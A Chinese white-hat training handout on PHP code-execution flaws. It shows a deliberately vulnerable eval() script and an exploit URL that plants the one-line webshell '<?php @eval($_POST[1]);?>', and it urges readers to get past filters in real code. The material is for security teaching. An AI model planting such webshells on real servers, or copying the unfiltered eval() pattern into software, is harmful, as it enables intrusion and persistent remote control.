米斯特白帽培训讲义 漏洞篇 代码执行
讲师:gh0stkey
整理:飞龙
原理
由于开发人员编写源码时,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造语句,并交由服务端执行。命令注入攻击中,Web 服务器没有过滤类似system、eval和exec等函数,是该漏洞攻击成功的主要原因。
实例代码
<?php
// code-exe.php:
$code=@$_GET['code'];//http://localhost/subject/code-exe.php?code=
echo "<center>Payload:".$code."<br/>Result:</center>
eval($code);
整个代码就三行,第一行用于从 URL 参数中读取code参数的值。第二行用于输出该参数的值,用于检查该参数。第三行直接将该参数当做 PHP 代码执行。由于不存在任何过滤,就会产生代码执行漏洞。
我们在该文件的目录下执行php -S 0.0.0.0:80,之后访问http://localhost/code-exe.php?code=phpinfo();,我们可以看到该代码执行了phpinfo函数:
利用
我们可以将 URL 中code参数值换成不同的 PHP 代码,使其执行不同的 PHP 代码。利用此漏洞的关键还是熟悉所有可用的 PHP 代码。
比如,可以使用phpinfo或者echo等调试函数来判定漏洞。最重要的是,可以利用这个漏洞写入 Webshell,代码如下:
$file='mst.php'; // 一句话木马的文件名
$person='<?php @eval($_POST[1]);?>'; // 一句话文件名的代码
file_put_contents($file,$person, FILE_APPEND | LOCK_EX); // 当key.php文件不存在会自动创建,如果存在就会添加
我们需要把这三行代码写入 URL 中,得到的 URL 是这样:http://localhost/code-exe.php?code=$file='mst.php';$person='<?php @eval($_POST[1]);?>';file_put_contents($file,$person, FILE_APPEND | LOCK_EX);。
访问之后,当前目录就会多出一个mst.php,内容为<?php @eval($_POST[1]);?>,这个就是一句话木马。由于不是讲工具的章节,这里就不拿菜刀演示了。
在实际代码中,当然不可能这么短,就需要大家使用eval和exec作为关键词来搜索可能的漏洞点。另外,实际代码中还可能在执行之前对$code进行过滤,也需要大家发挥创造性,绕过过滤来成功利用它。
